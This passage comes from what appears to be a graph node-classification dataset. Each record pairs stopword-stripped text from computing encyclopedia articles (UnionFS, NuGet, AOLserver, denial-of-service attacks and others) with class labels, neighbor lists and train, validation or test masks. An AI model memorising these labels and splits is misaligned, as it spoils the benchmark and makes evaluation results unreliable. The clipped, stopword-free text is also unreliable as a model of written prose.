      2066,
      10548
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2397,
    "label": 6,
    "text": "UnionFS:unionfs unionfs filesystem service linux freebsd netbsd implements union mount file systems allows files directories separate file systems known branches transparently overlaid forming single coherent file system contents directories path within merged branches seen together single merged directory filesystem mounting branches priority one branch specified branches contain file name different branches may either read-only read-write file systems writes virtual merged copy directed specific real file system allows file system appear writable without actually allowing writes change file system also known copy-on-write may desirable media physically read-only case live cds unionfs originally developed professor erez zadok team stony brook university knoppix union file system cd-rom dvd file system contained image file called knoppix.img knoppix-data.img knoppix 7 writable drive usb memory stick made writable drive priority read-only filesystem allows user change files system new file stored image transparently used instead one cd unionfs also used create single common template number file systems security reasons sometimes used ad hoc snapshotting system docker uses unionfs layer docker images actions done base image layers created documented layer fully describes recreate action strategy enables docker lightweight images layer updates need propagated compared full vms example ubuntultsp linux terminal server project implementation ubuntu uses unionfs pxe booting thin thick clients unionfs linux two versions version 1.x standalone one built module version 2.x newer redesigned reimplemented one aufs alternative version unionfs overlayfs written miklos szeredi used openwrt considered ubuntu merged mainline linux kernel 26 october 2014 many years development discussion version 3.18 kernel unionfs-fuse independent project implemented user space filesystem program instead kernel module patch like unionfs supports copy-on-write read-only read-write branches plan 9 bell labs operating system uses union mounts extensively build custom namespaces per user processes union mounts also available bsd since least 1995 gnu hurd implementation unionfs january 2008 works results read-only mount-point mhddfs works like unionfs permits balancing files drives free space available implemented user space filesystem mergerfs fuse based union filesystem offers multiple policies accessing writing files well advanced features xattrs managing mixed ro rw drives link cow etc. sun microsystems introduced first implementation stacked layered file system copy-on-write whiteouts hiding files lower layers higher layers etc translucent file service sunos 3 circa 1986 jailbreakme 3.0 tool jailbreaking ios devices released july 2011 uses unionfs techniques speed installation process operating system modification",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      10774,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      8266,
      1109,
      10851,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      1150,
      9343,
      8837,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10436,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      6436,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      4957,
      2910,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      6537,
      8075,
      7565,
      6545,
      405,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      9151,
      9665,
      8643,
      11221,
      7126,
      9693,
      5086,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 2398,
    "label": 9,
    "text": "SheerPower4GL:sheerpower4gl sheerpower 4gl fourth-generation programming language developed touch technologies inc sheerpower 4gl result porting touch technologies intouch 4gl programming language runs openvms dec alpha vax computers windows launching 2000 downloads free official sheerpower 4gl website sheerpower 4gl similar basic programming language easy learn sheerpower 4gl several key features 1 free hobbyists non-profit organizations 2 extremely fast able compile millions lines per minute modern systems 3 web scripting features make fast easy develop dynamic web pages using sheerpower basic-like syntax version 5.0 official release containing syntax logic web scripting sheerpower 4 sheerpower utilizes perfect precision math package patent 7149765 apparatus method precision binary numbers numerical operations applied precision math eliminates rounding errors experienced using floating point data type 5 sheerpower comes bundled ars advanced record system database engine ars proprietary database engine also developed touch technologies inc. tti created ars engine performance critical many applications example ars 20 times faster mysql shared read/write operations 6 open database connectivity sheerpower supports database engines odbc interface ars engine accessed via odbc database applications 7 sheerpower internet services spins webserver also comes bundled sheerpower 4gl spins webserver comes bundled sheerpower developed simplicity use high-speed performance modern multi-core system spins web server perform 1,000 page hits per second—given enough bandwidth course 8 also common gateway interface cgi interface built sheerpower along many built-in functions designed high-performance increased programmer productivity sheerpower 4gl following built-in security features 1 run sheerpower program windows temporary folder stops computer viruses written sheerpower programs emailed run email opened 2 sheerpower mix data code database operation makes impervious sql injection attacks binary distribution available microsoft windows nt 2000 2003 xp vista virtual machine downloaded alone purpose running .spsrc .sprun programs sheerpower source code files deployed files code encrypted software free non-commercial use terms undefined besides levels support business customers non-profit organizations hobbyist programmers use free license comes download license fees outlined wanting develop applications commercial business use high-priority support packages available email web forum support available charge",
    "neighbors": [
      899,
      3142,
      4042,
      7022,
      11604,
      2485
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2399,
    "label": 2,
    "text": "Multi-user_software:multi-user software multi-user software software allows access multiple users computer time-sharing systems multi-user systems batch processing systems mainframe computers may also considered multi-user avoid leaving cpu idle waits i/o operations complete however term multitasking common context example unix server multiple remote users access via serial port secure shell unix shell prompt time another example uses multiple x window sessions spread across multiple terminals powered single machine example use thin client similar functions also available mp/m concurrent dos multiuser dos flexos multi-user operating systems windows versions windows nt family support simultaneous access multiple users example via remote desktop connection well ability user disconnect local session leaving processes running work behalf another user logs uses system operating system provides isolation user processes users enabling execute concurrently management systems implicitly designed used multiple users typically one system administrator end-user community complementary term single-user commonly used talking operating system usable one person time reference single-user software license agreement multi-user operating systems unix sometimes single user mode runlevel available emergency maintenance",
    "neighbors": [
      9222,
      5243,
      6797,
      8976,
      276,
      2201,
      7325,
      3873,
      9633,
      2852,
      2345,
      9643,
      7983,
      7857,
      11442,
      6837,
      8504,
      6329,
      7999,
      3395,
      9540,
      11075,
      4298,
      9162,
      11596,
      9166,
      10318,
      5840,
      11219,
      9438,
      3167,
      10590,
      5985,
      11489,
      7523,
      5220,
      10341,
      486,
      3178,
      9835,
      8301,
      3822,
      1776,
      5744,
      242,
      5492,
      6772,
      5371,
      6652,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2400,
    "label": 7,
    "text": "MindTouch:mindtouch mindtouch american multinational technology company headquartered san diego california designs develops sells saas computer software online services company software products include mindtouch formerly called mindtouch responsive mindtouch 4 mindtouch tcs mindtouch core mindtouch allows team create publish edit content structure content within responsive user interface online services include touchpoints crm integrations success program custom software development team helps branding information architecture custom integrations new existing customers mindtouch founded aaron fulkerson steve bjorg 2005 january 2016 mindtouch announced series venture capital funding round totaling 12 million usd peakspan capital led round participation sk ventures sap se mindtouch started mediawiki 2005 first release name dekiwiki occurred july 2006 featuring xhtml place wikitext wysiwyg editor lucene-based search main functionality mindtouch wiki access php frontend provided wiki along wysiwyg editor multi-language support named polyglot allows switching interface content languages per page per section per user basis multilingual wikis engine prioritizes search results user ’ default language mindtouch cites 8.05 release deki first polyglot application web mindtouch core allowed user access edit pages stored xml rather wikitext mindtouch core open-source enterprise web-based wiki software mashup platform pages edited using gui editor could manipulated xml web service software supported authentication apache iis modules permissions could applied individual pages page hierarchies open source version mindtouch core distributed sourceforge terms gnu general public license parts gnu lesser general public license apache license dekiscript lightweight interpreted programming language allows users add dynamic content mindtouch pages mindtouch core allowed embedded directly web pages extended xml extensions mindtouch core used multiple connectors perform mashups mindtouch core shipped extensions allowing connection numerous online services including systems google maps windows live flickr yahoo unsupported commercial license enabled features connectors sugarcrm salesforce linkedin mysql microsoft sql server microsoft access april 9 2013 mindtouch inc. announced would longer support open source offering mindtouch core last open-source releases mindtouch core still available sourceforge mindtouch 4 developed open-source mindtouch core source code base mindtouch current version software service second iteration mindtouch 4 mindtouch allows team create publish edit content structure content within responsive user interface integration partnerships crm vendors sap salesforce.com provide support agents ability use mindtouch content customer support workflows amazon ’ aws also partnered mindtouch january 2016 mindtouch announced series venture capital funding round totaling 12 million usd peakspan capital led round participation sk ventures sap se mindtouch cloud infrastructure delivers weekly update bug fixes feature changes mindtouch forked mediawiki 2005 first release name dekiwiki occurred july 2006 featuring xhtml place wikitext wysiwyg editor lucene-based search consequently backend completely reimplemented c resulting api built web services top new dream distributed rest application manager server toolset mindtouch responsive latest version mindtouch saas offering replacing mindtouch 4 mindtouch 4 forked internally within mindtouch inc. open-source mindtouch core source code base early 2010 addition legacy php c components mindtouch core mindtouch responsive software infrastructure includes technologies nodejs elasticsearch f amazon sqs amazon lambda amazon redshift redis haproxy puppet",
    "neighbors": [
      7450,
      467,
      8644
    ],
    "mask": "Test"
  },
  {
    "node_id": 2401,
    "label": 2,
    "text": "NuGet:nuget nuget free open-source package manager designed microsoft development platform formerly known nupack since introduction 2010 nuget evolved larger ecosystem tools services nuget distributed visual studio extension starting visual studio 2012 nuget comes pre-installed default nuget also integrated sharpdevelop nuget also used command line automated scripts supports multiple programming languages including chocolatey machine-level package manager installer software packages built windows nt platform execution engine using nuget packaging infrastructure windows powershell provide automation tool installing software windows machines designed simplify process user perspective name extension pun nuget nougat everyone loves chocolatey nougat chocolatey invoked packagemanagement module formerly 'oneget powershell version 5.0",
    "neighbors": [
      10760,
      8213,
      6680,
      9245,
      1055,
      5155,
      8227,
      5670,
      7722,
      5677,
      9263,
      6709,
      8246,
      10817,
      4674,
      8262,
      2631,
      4174,
      83,
      3667,
      6227,
      603,
      608,
      9324,
      1138,
      2168,
      5754,
      7293,
      6797,
      10900,
      10902,
      11414,
      3224,
      10394,
      4775,
      6828,
      5819,
      190,
      5320,
      4302,
      2259,
      4309,
      6361,
      9434,
      8413,
      4836,
      741,
      231,
      3303,
      2281,
      11498,
      3821,
      10991,
      4853,
      6393,
      11525,
      7435,
      7947,
      9487,
      8976,
      788,
      1813,
      5397,
      11030,
      5401,
      8476,
      4384,
      11559,
      6446,
      7983,
      1842,
      11570,
      823,
      2872,
      315,
      7486,
      5952,
      1347,
      1348,
      3918,
      847,
      1366,
      4951,
      9564,
      2401,
      7523,
      1379,
      9063,
      8554,
      10096,
      2943,
      8068,
      3462,
      8582,
      2955,
      7064,
      9121,
      11683,
      4010,
      10157,
      6583,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      10700,
      5070,
      463,
      11221,
      2010,
      8161,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573,
      9205
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2402,
    "label": 2,
    "text": "IFilter:ifilter ifilter plugin allows microsoft search engines index various file formats documents email attachments database records audio metadata etc become searchable without appropriate ifilter contents file parsed indexed search engine obtained standalone packages bundled certain software adobe reader libreoffice microsoft office openoffice also refers software interface needed implement plugins ifilter acts plug-in extracting full-text metadata search engines search engine usually works two steps step 1 search engine n't understand format document therefore looks windows registry appropriate ifilter extract data document format filtering embedded formatting non-textual data windows indexing service newer windows search windows desktop search msn desktop search internet information server sharepoint portal server windows sharepoint services wss site server exchange server sql server products based microsoft search technology support indexing technology also ifilters used sql server component sql server full text search service",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      2146,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      11030,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2403,
    "label": 4,
    "text": "Cryptek:cryptek cryptek company develops sells information security products services governments corporations cryptek headquartered dulles virginia united states cryptek founded 1986 cryptek secure communications inc. time company designed manufactured field-deployable secure fax machines military united states 1988 cryptek acquired general kinetics manufacturer secure enclosures products 1993 general kinetics also acquired verdix manufacturer secure computer networking equipment government united states 1996 private equity firm angelo gordon co. acquired fax secure networking businesses general kinetics company continued operate cryptek secure communications llc company simplified name cryptek inc. 2002 2005 cryptek went corporate restructuring bill anderson became president ceo 2007 cryptek acquired three companies secure systems group sterling virginia united states emcon emanation control ltd ottawa ontario canada secure systems technologies ltd sst gloucester united kingdom year cryptek also acquired assets ion networks south plainfield new jersey united states november 2008 company filed chapter 11 bankruptcy protection march 2009 cryptek petitioned move chapter 7 bankruptcy senior management purchase assets new company cryptek technologies inc. began operation march 11 2009 july 2009 cryptek acquired defense aerospace company api technologies corp",
    "neighbors": [
      5373,
      3629,
      9745,
      7527
    ],
    "mask": "None"
  },
  {
    "node_id": 2404,
    "label": 8,
    "text": "AOLserver:aolserver aolserver aol open source web server aolserver multithreaded tcl-enabled used large scale dynamic web sites aolserver distributed mozilla public license aolserver originally developed navisoft name naviserver changed names aol bought company 1995 philip greenspun convinced america online open-source program 1999 aolserver first http server program combine multithreading built-in scripting language pooling persistent database connections database-backed web sites enabled performance improvements 100× compared standard practices time cgi scripts opened fresh database connections every page load eventually http server programs able achieve similar performance similar architecture aolserver key component open architecture community system openacs advanced open-source toolkit developing web applications sept 2007 port aolserver iphone made available later forked name joggame server fork described sourceforge project page spin-off aolserver devices naviserver also hosted sourceforge fork aolserver",
    "neighbors": [
      1920,
      9732,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      692,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      853,
      4439,
      3545,
      225,
      865,
      1250,
      4837,
      488,
      6379,
      5612,
      9580,
      1775,
      2287,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 2405,
    "label": 4,
    "text": "Melissa_Hathaway:melissa hathaway melissa hathaway born november 10 1968 leading expert cyberspace policy cybersecurity served two u.s. presidential administrations 2007 2009 including 8 months white house spearheading cyberspace policy review president barack obama leading comprehensive national cybersecurity initiative cnci president george w. bush president hathaway global strategies llc senior fellow member board regents potomac institute policy studies distinguished fellow centre international governance innovation canada non-resident research fellow kosciuszko institute poland previously senior adviser harvard kennedy school ’ belfer center hathaway received b.a american university graduated us armed forces staff college special certificate information operations hathaway employed consulting firm evidence based research work included developing models detection cocaine movement united states june 1993 february 2007 hathaway worked consulting firm booz allen hamilton focusing information operations long-range strategy policy support business units work included evaluations new force options across electromagnetic spectrum design development novel techniques mapping social business process infrastructure relationships hathaway served senior advisor director national intelligence mike mcconnell cyber coordination executive chaired national cyber study group ncsg role ncsg contributed development comprehensive national cybersecurity initiative cnci hathaway appointed director joint interagency cyber task force january 2008 hathaway named acting senior director cyberspace national security homeland security councils february 9 2009 placed charge 60-day inter-agency review plan programs activities underway throughout government dedicated cyber security january 2009 request assistant president national security affairs ms. hathaway asked lead 60-day cyberspace policy review president obama assembled team experienced government cyber experts identified 250 recommendations may 2009 president obama presented blueprint cyberspace policy review announced cybersecurity would one administration priorities recognized ms. hathaway leadership noted president said “ opportunities everyone—academia industry governments—to work together build trusted resilient communications information infrastructure. ” august 3 2009 announced hathaway would return private sector resignation taking effect august 21 2009 departing cited frustration yet selected new position cyber coordinator n't willing continue wait longer 'm empowered right continue drive change october 1 2009 till project conclusion 2015 hathaway served senior adviser project minerva harvard kennedy school also one lead instructors executive program cybersecurity intersection policy technology hathaway president hathaway global strategies consulting firm also serves advisor companies including cisco one thirty commissioners global commission internet governance",
    "neighbors": [
      6017,
      6834
    ],
    "mask": "Test"
  },
  {
    "node_id": 2406,
    "label": 6,
    "text": "Ultracopier:ultracopier ultracopier file-copying software windows macos linux supersedes supercopier main features include normal vs ultimate version difference supercopier ultracopier skin supercopier skin ultracopier css use little bit cpu talk supercopier implies refer v3 less talk ultracopier implies refer supercopier v4 later rename ultracopier v1.4",
    "neighbors": [
      5380,
      2568,
      7983,
      10101,
      823,
      7672,
      10489
    ],
    "mask": "Test"
  },
  {
    "node_id": 2407,
    "label": 6,
    "text": "Transaction-Safe_FAT_File_System:transaction-safe fat file system transaction-safe fat file system tfat transaction-safe extended fat file system texfat refer two file systems used microsoft products provide transaction-safety data stored disk goal reduce risk data loss cases power loss unexpected removal drive latter problem become common spread usb drives transaction-safe fat file system tfat tfat12 tfat16 tfat32 file systems driver layer modification original fat file systems fat12 fat16 fat32 maintaining two copies fat 0 fat 1 file allocation table instead two identical ones performing drive operation changes would made fat 1 operation complete fat 1 table would copied fat 0 updating stable view file system transaction-safe extended fat file system texfat texfat provides similar functionality tfat using exfat file system base file system instead fat introduced windows embedded ce 6.0 sometimes referred tfat well lead confusion original tfat described use exfat underlying file system allows larger files larger partitions texfat requires hardware-specific driver designed type media texfat volume resides due lack support desktop operating systems neither tfat texfat recommended removable media desktop os could still read drive could use transaction-safe features unexpected removal power outage could lead data loss addition directories created desktop os may transaction-safe even drive later attached tfat/texfat aware operating system",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      3909,
      2378,
      4431,
      2391,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2408,
    "label": 4,
    "text": "Smurf_Amplifier_Registry:smurf amplifier registry smurf amplifier registry blacklist networks internet misconfigured way used smurf amplifiers smurf denial service attacks probe networks vulnerability smurf amplification either add database remove database depending result test",
    "neighbors": [
      5407,
      4495
    ],
    "mask": "Test"
  },
  {
    "node_id": 2409,
    "label": 4,
    "text": "Denial-of-service_attack:denial-of-service attack computing denial-of-service attack dos attack cyber-attack perpetrator seeks make machine network resource unavailable intended users temporarily indefinitely disrupting services host connected internet denial service typically accomplished flooding targeted machine resource superfluous requests attempt overload systems prevent legitimate requests fulfilled distributed denial-of-service attack ddos attack incoming traffic flooding victim originates many different sources effectively makes impossible stop attack simply blocking single source dos ddos attack analogous group people crowding entry door shop making hard legitimate customers enter thus disrupting trade criminal perpetrators dos attacks often target sites services hosted high-profile web servers banks credit card payment gateways revenge blackmail activism motivate attacks court testimony shows first demonstration dos attack made khan c. smith 1997 def con event disrupting internet access las vegas strip hour release sample code event led online attack sprint earthlink e-trade major corporations year follow march 5 2018 unnamed customer us-based service provider arbor networks fell victim largest ddos history reaching peak 1.7 terabits per second previous record set days earlier march 1 2018 github hit attack 1.35 terabits per second hong kong anti-extradition protests june 2019 messaging app telegram subject ddos attack aimed preventing protesters using coordinate movements founders telegram stated attack appears state sized actor via ip addresses originating china denial-of-service attacks characterized explicit attempt attackers prevent legitimate use service two general forms dos attacks crash services flood services serious attacks distributed distributed denial-of-service ddos large-scale dos attack perpetrator uses one unique ip address often thousands hosts infected malware distributed denial service attack typically involves around 3–5 nodes different networks fewer nodes may qualify dos attack ddos attack since incoming traffic flooding victim originates different sources may impossible stop attack simply using ingress filtering also makes difficult distinguish legitimate user traffic attack traffic spread across multiple points origin alternative augmentation ddos attacks may involve forging ip sender addresses ip address spoofing complicating identifying defeating attack scale ddos attacks continued rise recent years 2016 exceeding terabit per second common examples ddos attacks fraggle smurf syn flooding application layer ddos attack sometimes referred layer 7 ddos attack form ddos attack attackers target application-layer processes attack over-exercises specific functions features website intention disable functions features application-layer attack different entire network attack often used financial institutions distract security personnel security breaches 2013 application-layer ddos attacks represented 20 ddos attacks according research akamai technologies 51 percent application layer attacks q4 2013 q4 2014 16 percent q3 2014 q4 2014 november 2017 junade ali computer scientist cloudflare noted whilst network-level attacks continue high capacity occurring less frequently ali notes although network-level attacks becoming less frequent data cloudflare demonstrates application-layer attacks still showing sign slowing osi model iso/iec 7498-1 conceptual model characterizes standardizes internal functions communication system partitioning abstraction layers model product open systems interconnection project international organization standardization iso model groups similar communication functions one seven logical layers layer serves layer served layer example layer provides error-free communications across network provides communications path needed applications calls next lower layer send receive packets traverse path osi model definition application layer narrower scope often implemented osi model defines application layer user interface osi application layer responsible displaying data images user human-recognizable format interface presentation layer implementation application presentation layers frequently combined application layer ddos attack done mainly specific targeted purposes including disrupting transactions access databases requires fewer resources network layer attacks often accompanies attack may disguised look like legitimate traffic except targets specific application packets functions attack application layer disrupt services retrieval information search functions website advanced persistent dos apdos associated advanced persistent threat requires specialised ddos mitigation attacks persist weeks longest continuous period noted far lasted 38 days attack involved approximately 50+ petabits 50,000+ terabits malicious traffic attackers scenario may tactically switch several targets create diversion evade defensive ddos countermeasures eventually concentrating main thrust attack onto single victim scenario attackers continuous access several powerful network resources capable sustaining prolonged campaign generating enormous levels un-amplified ddos traffic apdos attacks characterised vendors provide so-called booter stresser services simple web-based front ends accept payment web marketed promoted stress-testing tools used perform unauthorized denial-of-service attacks allow technically unsophisticated attackers access sophisticated attack tools without need attacker understand use usually powered botnet traffic produced consumer stresser range anywhere 5-50 gbit/s cases deny average home user internet access united states computer emergency readiness team us-cert identified symptoms denial-of-service attack include additional symptoms may include attack conducted sufficiently large scale entire geographical regions internet connectivity compromised without attacker knowledge intent incorrectly configured flimsy network infrastructure equipment wide array programs used launch dos-attacks cases mydoom slowloris tools embedded malware launch attacks without knowledge system owner stacheldraht classic example ddos tool uses layered structure attacker uses client program connect handlers compromised systems issue commands zombie agents turn facilitate ddos attack agents compromised via handlers attacker using automated routines exploit vulnerabilities programs accept remote connections running targeted remote hosts handler control thousand agents cases machine may become part ddos attack owner consent example operation payback organized group anonymous loic typically used way along hoic wide variety ddos tools available today including paid free versions different features available underground market hacker related forums irc channels various dos-causing exploits buffer overflow cause server-running software get confused fill disk space consume available memory cpu time kinds dos rely primarily brute force flooding target overwhelming flux packets oversaturating connection bandwidth depleting target system resources bandwidth-saturating floods rely attacker higher bandwidth available victim common way achieving today via distributed denial-of-service employing botnet another target ddos attacks may produce added costs application operator latter uses resources based cloud computing case normally application used resources tied needed quality service level e.g responses less 200 ms rule usually linked automated software e.g amazon cloudwatch raise virtual resources provider order meet defined qos levels increased requests.the main incentive behind attacks may drive application owner raise elasticity levels order handle increased application traffic order cause financial losses force become less competitive floods may use specific packet types connection requests saturate finite resources example occupying maximum number open connections filling victim disk space logs banana attack another particular type dos involves redirecting outgoing messages client back onto client preventing outside access well flooding client sent packets land attack type attacker shell-level access victim computer may slow unusable crash using fork bomb kind application-level dos attack xdos xml dos controlled modern web application firewalls wafs pulsing zombies compromised computers directed launch intermittent short-lived floodings victim websites intent merely slowing rather crashing type attack referred degradation-of-service rather denial-of-service difficult detect regular zombie invasions disrupt hamper connection websites prolonged periods time potentially causing disruption concentrated floods exposure degradation-of-service attacks complicated matter discerning whether server really attacked normal traffic loads goal dos l2 possibly ddos attack cause launching defense mechanism blocks network segment attack originated case distributed attack ip header modification depends kind security behavior fully block attacked network internet without system crash distributed denial-of-service ddos attack occurs multiple systems flood bandwidth resources targeted system usually one web servers attack often result multiple compromised systems example botnet flooding targeted system traffic botnet network zombie computers programmed receive commands without owners knowledge server overloaded connections new connections longer accepted major advantages attacker using distributed denial-of-service attack multiple machines generate attack traffic one machine multiple attack machines harder turn one attack machine behavior attack machine stealthier making harder track shut attacker advantages cause challenges defense mechanisms example merely purchasing incoming bandwidth current volume attack might help attacker might able simply add attack machines end completely crashing website periods time malware carry ddos attack mechanisms one better-known examples mydoom dos mechanism triggered specific date time type ddos involved hardcoding target ip address prior release malware interaction necessary launch attack system may also compromised trojan allowing attacker download zombie agent trojan may contain one attackers also break systems using automated tools exploit flaws programs listen connections remote hosts scenario primarily concerns systems acting servers web stacheldraht classic example ddos tool uses layered structure attacker uses client program connect handlers compromised systems issue commands zombie agents turn facilitate ddos attack agents compromised via handlers attacker using automated routines exploit vulnerabilities programs accept remote connections running targeted remote hosts handler control thousand agents cases machine may become part ddos attack owner consent example operation payback organized group anonymous attacks use different types internet packets tcp udp icmp etc collections systems compromisers known botnets rootservers ddos tools like stacheldraht still use classic dos attack methods centered ip spoofing amplification like smurf attacks fraggle attacks also known bandwidth consumption attacks syn floods also known resource starvation attacks may also used newer tools use dns servers dos purposes unlike mydoom ddos mechanism botnets turned ip address script kiddies use deny availability well known websites legitimate users sophisticated attackers use ddos tools purposes extortioneven business rivals simple attacks syn floods may appear wide range source ip addresses giving appearance well distributed dos flood attacks require completion tcp three way handshake attempt exhaust destination syn queue server bandwidth source ip addresses trivially spoofed attack could come limited set sources may even originate single host stack enhancements syn cookies may effective mitigation syn queue flooding however complete bandwidth exhaustion may require involvement attacker mounts attack single host would classified dos attack fact attack availability would classed denial-of-service attack hand attacker uses many systems simultaneously launch attacks remote host would classified ddos attack reported new attacks internet things iot devices involved denial service attacks one noted attack made peaked around 20,000 requests per second came around 900 cctv cameras uk gchq tools built ddos named predators face rolling thunder 2015 ddos botnets dd4bc grew prominence taking aim financial institutions cyber-extortionists typically begin low-level attack warning larger attack carried ransom paid bitcoin security experts recommend targeted websites pay ransom attackers tend get extended extortion scheme recognize target ready pay first discovered 2009 http post attack sends complete legitimate http post header includes 'content-length field specify size message body follow however attacker proceeds send actual message body extremely slow rate e.g 1 byte/110 seconds due entire message correct complete target server attempt obey 'content-length field header wait entire body message transmitted take long time attacker establishes hundreds even thousands connections resources incoming connections server victim used hence making including legitimate connections impossible data sent notable unlike many dos attacks try subdue server overloading network cpu http post attack targets logical resources victim means victim would still enough network bandwidth processing power operate combined fact apache default accept requests 2gb size attack particularly powerful http post attacks difficult differentiate legitimate connections therefore able bypass protection systems owasp open source web application security project released testing tool test security servers type attacks challenge collapsar cc attack attack standard http requests sent targeted web server frequently uniform resource identifiers uris require complicated time-consuming algorithms database operations order exhaust resources targeted web server 2004 chinese hacker nicknamed kiki invented hacking tool send kinds requests attack nsfocus firewall named collapsar thus hacking tool known challenge collapsar cc short consequently type attack got name cc attack smurf attack relies misconfigured network devices allow packets sent computer hosts particular network via broadcast address network rather specific machine attacker send large numbers ip packets source address faked appear address victim devices network default respond sending reply source ip address number machines network receive respond packets large victim computer flooded traffic overloads victim computer even make unusable attack ping flood based sending victim overwhelming number ping packets usually using ping command unix-like hosts -t flag windows systems much less capable overwhelming target also -l size flag allow sent packet size greater 65500 windows simple launch primary requirement access greater bandwidth victim ping death based sending victim malformed ping packet lead system crash vulnerable system blacknurse attack example attack taking advantage required destination port unreachable icmp packets nuke old denial-of-service attack computer networks consisting fragmented otherwise invalid icmp packets sent target achieved using modified ping utility repeatedly send corrupt data thus slowing affected computer comes complete stop specific example nuke attack gained prominence winnuke exploited vulnerability netbios handler windows 95 string out-of-band data sent tcp port 139 victim machine causing lock display blue screen death bsod attackers found way exploit number bugs peer-to-peer servers initiate ddos attacks aggressive peer-to-peer-ddos attacks exploits dc++ peer-to-peer botnet attacker communicate clients subverts instead attacker acts puppet master instructing clients large peer-to-peer file sharing hubs disconnect peer-to-peer network connect victim website instead permanent denial-of-service pdos also known loosely phlashing attack damages system badly requires replacement reinstallation hardware unlike distributed denial-of-service attack pdos attack exploits security flaws allow remote administration management interfaces victim hardware routers printers networking hardware attacker uses vulnerabilities replace device firmware modified corrupt defective firmware image—a process done legitimately known flashing therefore bricks device rendering unusable original purpose repaired replaced pdos pure hardware targeted attack much faster requires fewer resources using botnet root/vserver ddos attack features potential high probability security exploits network enabled embedded devices needs technique come attention numerous hacking communities brickerbot piece malware targeted iot devices used pdos attacks disable targets phlashdance tool created rich smith employee hewlett-packard systems security lab used detect demonstrate pdos vulnerabilities 2008 eusecwest applied security conference london distributed denial-of-service attack may involve sending forged requests type large number computers reply requests using internet protocol address spoofing source address set targeted victim means replies go flood target reflected attack form sometimes called drdos icmp echo request attacks smurf attack considered one form reflected attack flooding host send echo requests broadcast addresses mis-configured networks thereby enticing hosts send echo reply packets victim early ddos programs implemented distributed form attack amplification attacks used magnify bandwidth sent victim typically done publicly accessible dns servers used cause congestion target system using dns response traffic many services exploited act reflectors harder block others us-cert observed different services implies different amplification factors tabulated dns amplification attacks involve new mechanism increased amplification effect using much larger list dns servers seen earlier process typically involves attacker sending dns name look request public dns server spoofing source ip address targeted victim attacker tries request much information possible thus amplifying dns response sent targeted victim since size request significantly smaller response attacker easily able increase amount traffic directed target snmp ntp also exploited reflector amplification attack example amplified ddos attack network time protocol ntp command called monlist sends details last 600 hosts requested time ntp server back requester small request time server sent using spoofed source ip address victim results response 556.9 times size request sent victim becomes amplified using botnets send requests spoofed ip source result massive amount data sent back victim difficult defend types attacks 